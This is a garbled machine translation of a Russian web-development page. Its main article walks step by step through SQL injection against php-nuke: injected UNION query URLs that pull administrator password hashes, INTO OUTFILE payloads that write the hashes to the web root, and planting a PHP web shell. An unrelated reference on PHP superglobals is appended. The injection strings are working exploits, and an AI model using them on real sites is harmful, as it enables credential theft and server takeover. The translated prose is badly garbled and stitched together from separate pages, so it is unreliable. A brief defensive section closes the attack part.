Home Home Page Sending SMS with use of the Internet Cursor for a site the hands. A part the second The status of the domain WML - Creation WAP of pages Safety at job with WebMoney The comparative test of efficiency of programming languages for WEB Use of UNION command Optimization of productivity of databases for Web Check of the form on JavaScript Fight with lists or application of classes for a conclusion of lists in PHP AJAX? Atlas! We do{make} the elementary similarity of Internet - shop. Than to correct a photo: 5 free-of-charge editors The directory on meta tegam All about AuthType or authorization in Apache Regular expressions are used for a complex manipulation by lines in PHP Protection of a site against uploading Use of sessions in PHP Links
topic
 

Use of UNION command

So union command is used for association of a conclusion of two or more searches select.

Features of the command which should be taken into account:

When two (or more) search are exposed to association, them stolbcy a conclusion should be compatible for association. It means, that each search should specify identical quantity{amount} stolbcov and in the same order and everyone should have the type compatible with everyone.

Also the given opportunity pojavilat` only in mysql versions 4.0 i.e. on earlier versions of a DB will not work.


The kind of the command is those:



select a1, a2, a3 from table1 union select b1, b2, b3 from table2;


Where a1 and b1, a2 and b2, a3 and b3 should be identical type.


For example:



select text11, text12, int11 from t1 union select text21, text22, int22 from t2;


I think it will be most convenient to consider job with the given command on a concrete example. To torment I offer php-nuke versions 7.0 final. I advise to download and put given dvizhek. So we establish{install} and it is adjusted njuku. We start mysql with conducting dens and we start.


================================================

---/// sql injection on an example php-nuke

================================================


Let's understand so with the module news


http: // 127.0.0.1/nuke7/modules.php? name=news*new_topic=1


Such search deduces the first topik on a cursor. We shall try to put kavychku to value new_topic, accordingly now the search becomes such:


http: // 127.0.0.1/nuke7/modules.php? name=ne... ew_topic=1 '


We give in a browser search and we look broad gullies mysql:

...

10 query select topictext from nuke_topics where topicid = ' 1 "

^!!!


10 query select sid, catid, aid, title, time, hometext, bodytext, comments, counter, topic, informant, notes, acomm,

score, ratings from nuke_stories where topic = ' 1 " order by sid desc limit 10

^!!!

...


Here we kovychka also has shown herself =)

See: where topicid = ' 1 "


Let's consider the first search:


select topictext from nuke_topics where topicid = ' 1 "

Sample topictext from the table nuke_topics where topicid=1 '

Now we shall see type topictext:


+-------------------------+

| topictext | varchar (40) |

+-------------------------+


Perfectly now we shall try to use union command:

We give in a browser search:



modules.php? name=news*new_topic=999 union select pwd from nuke_authors/*


Perfectly =) Instead of the name of the unit we see khesh the password of the administrator. That has taken place.

Again we look broad gullies mysql:



14 query select topictext from nuke_topics where topicid = '999' union select pwd from nuke_authors/* '


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

He our search



It. We do{make} sample from nuke_topics where topicid = ' 999 ' and the given search naturally returns nothing since such topika at us no and we do{make} sample pwd of the table nuke_authors and the given search returns khesh the password of the first user which is substituted in the name of the unit. Notice that if we shall specify existing number{room} topika that of result we shall not receive since the name of it topika instead of khesh will be substituted. Therefore we also use number{room} 999. first vulnerability =)


Let's consider the second search: (the search is broken into some lines for convenience)


select sid, catid, aid, title, time, hometext, bodytext, comments, counter, topic, informant, notes, acomm, score, ratings

from nuke_stories

where topic = ' 1 " <-Here we can insert the sql-code

order by sid desc limit 10


Let's see what types of the data at us in the table nuke_stories:


+-----------+--------------+

| sid | int (11) |

+-----------+--------------+

| catid | int (11) |

+-----------+--------------+

| aid | varchar (30) |

+-----------+--------------+

| title | varchar (80) |

+-----------+--------------+

| time | datetime |

+-----------+--------------+

| hometext | text |

+-----------+--------------+

| bodytext | text |

+-----------+--------------+

| comments | int (11) |

+-----------+--------------+

| counter | mediumint (8) |

+-----------+--------------+

| topic | int (3) |

+-----------+--------------+

| informant | varchar (20) |

+-----------+--------------+

| notes | text |

+-----------+--------------+

| acomm | int (1) |

+-----------+--------------+

| score | int (10) |

+-----------+--------------+

| ratings | int (10) |

+-----------+--------------+


Now also we shall see{overlook} the table nuke_authors on types of recordings and we shall make search with union thus that types from the table nuke_stories coincided with types from nuke_authors and the search will become:


modules.php? name=news*new_topic=999 ' union select counter, counter, pwd, pwd, counter, pwd, pwd, counter, counter, counter, pwd, pwd, counter, counter, counter from nuke_authors/*


We give search in a browser and it is seen topik with the maintenance{contents} khesha the password =) Here not so necessarily to specify nonexistent topik since all works and with topikom existing in base.


If to see broad gullies of a DB that it was possible to see that such search to a database is given: (the search is broken into 4 blocks for the greater convenience)



select sid, catid, aid, title, time, hometext, bodytext, comments, counter, topic, informant, notes, acomm, score, ratings

from nuke_stories

where topic = ' 1 '


union


select counter, counter, pwd, pwd, counter, pwd, pwd, counter, counter, counter, pwd, pwd, counter, counter, counter

from nuke_authors


/*

' order by sid desc limit 10


As you can see in both searches quantity{amount} and types stolbcev coincide.

The search is specially broken into 4 blocks:

1 block is first search select choosing of the table nuke_stories

2 block - the command of association of searches union

3 block - select which chooses the second search khesh the password and the counter from the table nuke_authors

4 block - all that goes after " / * " will be considered{examined} as the comment


================================================

---/// the Conclusion of the data in a file

================================================


By the way, in an Internet full practically identical clauses{articles} about sql-injection and all of them tell about attacks of the given type at use ms sql as the server of a database. Certainly the server from melkomjagkikh gives poistinne tremendous opportunities for breaking all server at the expense of opportunities of division of searches in line and other chesspieces but it is a subject of other clause{article} and at us on the agenda mysql in which all not so is simple, but it is completely not bad, it is good since with mysql is carried more difficultly so more interestingly =) And to what I it have said? Yes it is simple in those clauses{articles} breaking is described at authorization and authorization there occurs approximately such search:



select * from users where login ='blabla ' and password ='blabla ';


Perversion! Not the truth - whether? Absolutely poor mode of work with a database. What for is asked to choose all data from the table? Brrr something at all there has carried away me = we we shall consider authorization in php-nuke 6.9. in which process of authorization better is made more competently and beautifully. Pay attention to the version njuki! The matter is that in version 7.0 it will not be possible to introduce through the form a code with the help inverted commas since there this of a bug is covered. In version 7.0 there is an opportunity of introduction of a code in this module by means of cookie but we meanwhile shall not touch cookie since on this subject clause{article} will be hardly later and we shall consider introduction of a code simply through the form of authorization. For this purpose also it was necessary to use earlier version. As an example.

We start http://127.0.0.1/phpnuke69/admin.php and it is seen okoshko for input of a login and the password. Well you likely have already guessed that we shall do{make}? Certainly we enter as a login admin ' (do not forget about kavychku) and 123 in kach-ve the password. KHmmm... Does not let =) Well chtozh everyone happens =) Likely because a login and the password in base others absolutely =)))

CHtozh again we climb to look broad gullies mysql:



1 query select pwd, admlanguage from nuke_authors where aid ='admin '


^ - she our native kavychka =)


Stop! You have already run to insert union and select? Early. The matter is that in the given module there is no conclusion of the received data from a DB. Naturally time no a conclusion that and to deduce{remove} received khesh to us there is no place. What to do{make}. Fortunately in mysql there is a remarkable option of preservation of the data chosen from the table in a file. The given feint by ears as follows is made:



select * from table into outfile ' a put`_k_fajlu/file ';


Let's try to save khesh the password of the administrator in a file. The form of input does not allow to enter a long login therefore it is necessary to pass the data in a line of a browser:


http: // 127.0.0.1/phpnuke69/admin.php? op=lo... *aid=admin ' into outfile ' pwd.txt


After search of the given line in a DB it is executed:



9 query select pwd, admlanguage from nuke_authors where aid ='admin ' into outfile 'pwd.txt'


And khesh the password of the user "admin" it appears it is written down in a file pwd.txt. But all problemma in that that a file is created not radically the www-server and in the catalogue of a database. For creation of a file in the catalogue accessible through web it is necessary to specify a full way:


/phpnuke/admin.php? op=login*pwd=123*aid=admin ' into outfile '././././www/www1/phpnuke69/pwd.txt


And already:


http://127.0.0.1/phpnuke69/pwd.txt


Will give out to us khesh the administrator.

Certainly it is necessary to take into account access rights and not the fact that you can write down a file in the necessary place but it now is not important. The main thing that we could generate the necessary search and create a file.


================================================

---/// Reception of a http-shell

================================================


Certainly databases it is good, it is interesting and cognitive, but it would be desirable that that of the greater =) Them is at me =)

As we have already understood files we can create. And in fact in a file it is possible to write down any infu from a database why to not use it and to not create to itself small such http-shell by means of creation php a file with simple and likely all familiar maintenance{contents}:


So having used one of the methods described above you managed to receive all the same khesh the password of the administrator and you it is safe zaloginilis` as the administrator of a cursor, having deciphered the password, or having inserted it  in kukis (the subject about kuki will be in more detail considered in following clause{article}) Now it is necessary for you to insert somehow a php-code into one of values in a database and then to deduce{remove} it  in a file. The way which has used I:


Loginimsja under the administrator. In the menu of administration we enter into section topics. We create new topik.

To a field topic name we write passthru

To a field topic text we write:


Now we shall recollect vulnerability described above in this clause{article}, namely:


modules.php? name=news*new_topic=999 ' union select pwd from nuke_authors/*

select topictext from nuke_topics where topicid = '999' union select pwd from nuke_authors/* '


Now we should not receive khesh the password, and it is necessary to save recording from a column "topictext"


http: // 127.0.0.1/phpnuke/modules.php? name =... ew_topic=2 ' into outfile 'shell.php'/*


Where 2 - number{room} new topika, shell.php - the file which will be created


Do not forget to register a way to a file.

After performance of the given search the file shell.php containing necessary will be created

To us a pkhp-code.



================================================

---/// Methods of protection

================================================


If all of you-taki have read clause{article} that likely have already understood that is unique correct protection kill of all data accepted from the user is. The best decision will resolve use only letters and figures. In a case if accepted value should be figure, proverjaejte it  before a premise{room} in sql search.

There is no nadejatsja on kill only one inverted commas since first attacking can use other symbols for if not introductions of a code then for more information (for example about a way to a site) from messages on mistakes. And second if the script filters any symbol it is possible to replace it  a design +char (0xKOD_SIMVOLA) +.

Also I shall pay attention what to filter all is necessary all data come from the user in searches, in kukakh, in general in general!



================================================

---/// the Conclusion

================================================


Well that's all. I have tried to consider the most informative examples of attacks such as sql-injection. I hope now you can avoid mistakes at kodinge scripts working with databases. Success.

p.s. The information in given clause{article} serves exclusively in the educational purposes. This clause{article} only attempt to help authors of scripts and to specify possible{probable} mistakes at job with databases. So to say, the enemy needs to be known by sight!



\\\\\\\\\\\\\\




Predetermined variables PHP

Server variables: $ _server

The note: are entered into versions 4.1.0. In the previous versions use $http_server_vars.


$ _server it is a file containing such information, as headers/caps, paths/ways and accommodation of scripts. Ocurrences in this file are created by the web-server. There is no guarantee, that each web-server will give something from this; the server can lower{omit} the positions specified here, or to add new, here not specified. A plenty of these variables for the specification cgi 1.1 is totaled, therefore you should take into account it.


It ' superglobal ', or automatic, variable. It simply means, that she is accessible in all areas of visibility in a script. You should not enter global $ _server; for access to her inside functions or methods as it is done{made} with $http_server_vars.


$http_server_vars contains the same initial information, but it not avtoglobal. (Pay attention, that http_server_vars and $ _server it is different variables and that php processes them differently.)


If register_globals directive is established, these variables also become accessible in global area of visibility of a script; i.e. irrespective of files $ _server and $http_server_vars. In addition see the chapter{head} about safety Use register_globals. These separate globaly are not avtoglobalami.


You can or can not find the following variable elements in $ _server. Pay attention, that only the some people (if at all any) from these elements will be accessible (or will have other value) at start php from the command line.


' php_self '

Name of a file of a script executed at present; be relative document root. For example, $ _server [' php_self '] in a script with the address http://example.com/test.php/foo.bar will give/test.php/foo.bar.


If php it is started as the processor of the command line, this variable is inaccessible.


' argv '

File of the arguments transmitted to a script. If the script works from the command line, it gives access, in style With, to parameters of the command line. If it is caused through a method get, will contain a line of search.


' argc '

Contains quantity{amount} of parameters of the command line transmitted to a script (if it is started from the command line).


' gateway_interface '

What variant of the specification cgi is used by the server; for example, ' cgi/1.1 '.


' server_name '

The host name of the server on which the current script is carried out. If the script is started on a virtual host, it will be the value determined for the given virtual host.


' server_software '

The line - identifier of the server, given in caps / headers at answers to searches.


' server_protocol '

Name and the version of the information report on which the page is requested; for example, ' http/1.0 ';


' request_method '

What method of search has been used for access to page; for example, ' get ',' head ',' post ',' put '.


' query_string '

Line of search if is present on which access to page has been executed.


' document_root '

Root directory of documents under which the current script as it is determined in a file of a configuration of the server is carried out.


' http_accept '

Contents of a cap accept: from the current search if is present.


' http_accept_charset '

Contents of a cap accept-charset: from the current search if is present. An example: ' iso-8859-1, *, utf-8 '.


' http_accept_encoding '

Contents of a cap accept-encoding: from the current search if is present. An example: ' gzip '.


' http_accept_language '

Contents of a cap accept-language: from the current search if is present. An example: ' en '.


' http_connection '

Contents of a cap connection: from the current search if is present. An example: ' keep-alive '.


' http_host '

Contents of a cap host: from the current search if is present.


' http_referer '

The address of page (if is present) which has directed user agent (PA) on the current page. It is established PAgentom. Not all PA will establish it , and the some people can modify http_referer. To put it briefly, to trust him it is impossible.


' http_user_agent '

Contents of a cap user_agent: from the current search if is present. It is a line designating PA, the executed access to page. A typical example: mozilla/4.5 [en] (x11; u; linux 2.2.9 i586). Besides other, you can use this value with get_browser () for the adaptation of a conclusion of your page to opportunities PAgenta.


' remote_addr '

Ip-address from which the user looks through the current page.


' remote_port '

Port by the user machine for connection with the web-server.


' script_filename '

Absolute way to a file of a script executed at present.


' server_admin '

The value given in server_admin directive (for apache) in a file of a configuration of the web-server. If the script is started on a virtual host, it will be the value determined for the given virtual host.


' server_port '

Port by the server machine, used by the web-server for connection. By default it ' 80 '; use ssl, for example, will change this value to what you have defined{determined} for confidential port http.


' server_signature '

The line containing the version of the server and a name of a virtual host, added to pages generated by the server if this opportunity is switched on.


' path_translated '

Way of file system (not document root) to the current script after the server has executed display virtual-to-real.


' script_name '

Way to the current script. It is used in pages to which need to specify on itself.


' request_uri '

uri which have been set for access to the given page; for example, '/index.html '.


' php_auth_user '

At job under the apache-module and performance http-autentifikacii, in this variable it is established username, given by the user.


' php_auth_pw '

At job under the apache-module and performance http-autentifikacii, in this variable it is established password, given by the user.


' php_auth_type '

At job under the apache-module and performance http-autentifikacii, in this variable the type autentifikacii is established.


Variable environments: $ _env

The note: are entered into versions 4.1.0. In the previous versions use $http_env_vars.


These variables are imported to global space of names php from an environment in which it is started razborhhik (interpreter) php. Many are given by the shell under which php works, and different systems start, obviously, different kinds of shells, therefore to create any certain list it is impossible. See{overlook} in the documentation of your shell the list of the certain variables of an environment.


Other variable environments are the cgi-variable placed here irrespective of, is started php as the server module or as the cgi-processor.


It ' superglobal ' (or automatic global) a variable. It means, that she is accessible in all areas of visibility of a script. You do not need to write down global $ _env; for access to her in functions or methods as you do{make} with $http_env_vars.


$http_env_vars contains the same initial information, but it not avtoglobal. (Pay attention, that http_env_vars and $ _env it is different variables and that php processes them differently.)


If register_globals directive is established, these variables also become accessible in global area of a script; that is irrespective of files $ _env and $http_env_vars. In addition see the chapter{head} about safety Use register_globals. These separate globaly are not avtoglobalami.


http-Cooks: $ _cookie

The note: are entered into versions 4.1.0. In the previous versions use $http_cookie_vars.


Associative file of the variables transmitted to the current script through http-kuki. are automatically global in any area of visibility.


It ' superglobal ' (or automatic global) a variable. It means, that she is accessible in all areas of visibility of a script. You do not need to write down global $ _cookie; for access to her in functions or methods as you do{make} with $http_cookie_vars.


$http_cookie_vars contains the same initial information, but it not avtoglobal. (Pay attention, that http_cookie_vars and $ _cookie it is different variables and that php processes them differently.)


If register_globals directive is established, these variables also become accessible in global area of a script; that is irrespective of files $ _cookie and $http_cookie_vars. In addition see the chapter{head} about safety Use register_globals. These separate globaly are not avtoglobalami.


http get-variables: $ _get

The note: are entered into versions 4.1.0. In the previous versions use $http_get_vars.


Associative file of the variables transmitted to the current script through a method http get. are automatically global in any area of visibility.


It ' superglobal ' (or automatic global) a variable. It means, that she is accessible in all areas of visibility of a script. You do not need to write down global $ _get; for access to her in functions or methods as you do{make} with $http_get_vars.


$http_get_vars contains the same initial information, but it not avtoglobal. (Pay attention, that http_get_vars and $ _get it is different variables and that php processes them differently.)


If register_globals directive is established, these variables also become accessible in global area of a script; that is irrespective of files $ _get and $http_get_vars. In addition see the chapter{head} about safety Use register_globals. These separate globaly are not avtoglobalami.


http post-variables: $ _post

The note: are entered into versions 4.1.0. In the previous versions use $http_post_vars.


Associative file of the variables transmitted to the current script through a method http post. are automatically global in any area of visibility.


It ' superglobal ' (or automatic global) a variable. It means, that she is accessible in all areas of visibility of a script. You do not need to write down global $ _post; for access to her in functions or methods as you do{make} with $http_post_vars.


$http_post_vars contains the same initial information, but it not avtoglobal. (Pay attention, that http_post_vars and $ _post it is different variables and that php processes them differently.)


If register_globals directive is established, these variables also become accessible in global area of a script; that is irrespective of files $ _post and $http_post_vars. In addition see the chapter{head} about safety Use register_globals. These separate globaly are not avtoglobalami.


Variable http-loadings of files: $ _files

The note: are entered into versions 4.1.0. In the previous versions use $http_post_files.


Associative file of the elements loaded in the current script by a method http post. are automatically global in any area of visibility.


It ' superglobal ' (or automatic global) a variable. It means, that she is accessible in all areas of visibility of a script. You do not need to write down global $ _files; for access to her in functions or methods as you do{make} with $http_post_files.


$http_post_files contains the same information, but is not avtoglobalom.


If register_globals directive is established, these variables also become accessible in global area of a script; that is irrespective of files $ _files and $http_post_files. In addition see the chapter{head} about safety Use register_globals. These separate globaly are not avtoglobalami.


Variables of search: $ _request

The note: are entered into versions 4.1.0. In the previous versions of an equivalent file no.


The associative file consisting of contents $ _get, $ _post, $ _cookie and $ _files.


It ' superglobal ' (or automatic global) a variable. It means, that she is accessible in all areas of visibility of a script. You do not need to write down global $ _request; for access to her in functions or methods.


If register_globals directive is established, these variables also become accessible in global area of a script; that is irrespective of a file $ _request. In addition see the chapter{head} about safety Use register_globals. These separate globaly are not avtoglobalami.


Variable sessions: $ _session

The note: are entered into versions 4.1.0. In the previous versions use $http_session_vars.


The associative file containing variable sessions, accessible to the current script. See also Functions of sessions.


It ' superglobal ' (or automatic global) a variable. It means, that she is accessible in all areas of visibility of a script. You do not need to write down global $ _session; for access to her in functions or methods as you do{make} with $http_session_vars.


$http_session_vars contains the same information, but is not avtoglobalom.


If register_globals directive is established, these variables also become accessible in global area of a script; that is irrespective of files $ _session and $http_session_vars. In addition see the chapter{head} about safety Use register_globals. These separate globaly are not avtoglobalami.


Global variables: $globals

The note: $globals are accessible since php 3.0.0.


The associative file containing the links to all variables which are determined at present in global area of visibility of a script. Names of variables are keys in a file.


It ' superglobal ' (or automatic global) a variable. It means, that she is accessible in all areas of visibility of a script. You do not need to write down global $globals; for access to her in functions or methods.


The previous message on a mistake: $php_errormsg

$php_errormsg it is a variable containing the text of last message on a mistake, generated php. This variable is accessible only in that area of visibility in which the mistake has arisen, and only if the option of a configuration track_errors switched on / on (by default she - off).